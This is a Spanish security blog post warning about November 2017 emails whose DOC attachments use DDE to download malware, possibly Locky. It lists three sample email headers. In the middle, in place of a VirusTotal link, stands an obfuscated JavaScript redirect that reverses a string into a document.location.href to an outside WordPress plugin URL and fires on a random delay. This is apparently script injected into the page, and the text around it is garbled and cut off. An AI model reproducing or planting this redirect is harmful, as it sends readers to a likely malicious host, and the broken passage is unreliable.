MAILS QUE SE RECIBEN CON FICHERO DOC ANEXADO, QUE DESCARGAN MALWARE

Asi como ayer llegaron tres mails sin anexado, que pensabamos podía ser algun nuevo método infeccioso, pero debió tratarse de un fallo del hacker ya que hoy siguen llegando los normales anexando DOC con tecnicas DDE, eso si, sin texto en el mail y siendo el dominio del remitente extraido del destinatario, como se puede ver en las siguienes capturas:

Asunto: Invoice
De: Dominique <Dominique.03@dominio destinatario>
Fecha: 10/11/2017 4:31
Para: <destinatario>

ANEXADO: EIY000690.DOC
——

Asunto: Paper
De: Muriel <Muriel.1241@dominio destinatario>
Fecha: 09/11/2017 18:22
Para: sat <destinatario>

ANEXADO: LD00045269.DOC

——

Asunto: Invoice
De: Queen <Queen.05@dominio destinatario>
Fecha: 09/11/2017 20:00
Para: <destinatario>

ANEXADO: AYS0007098.DOC

——

Los preanalisis de los ficheros enviados ofrecen estos informes en el preanalisis de virustotal:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/11c494d5b1a8ba84c3f7122a7ca2465e9befa35be195b02c34661da9e59039e1/analysis/1510300815/” target=”_blank” rel=”noopener”>analisis fichero LD00045269.DOC

torizados, controlaremos los ficheros que descarguen (posiblemente ransomware LOCKY asasin) a partri del ELISTARA 37.84 de hoy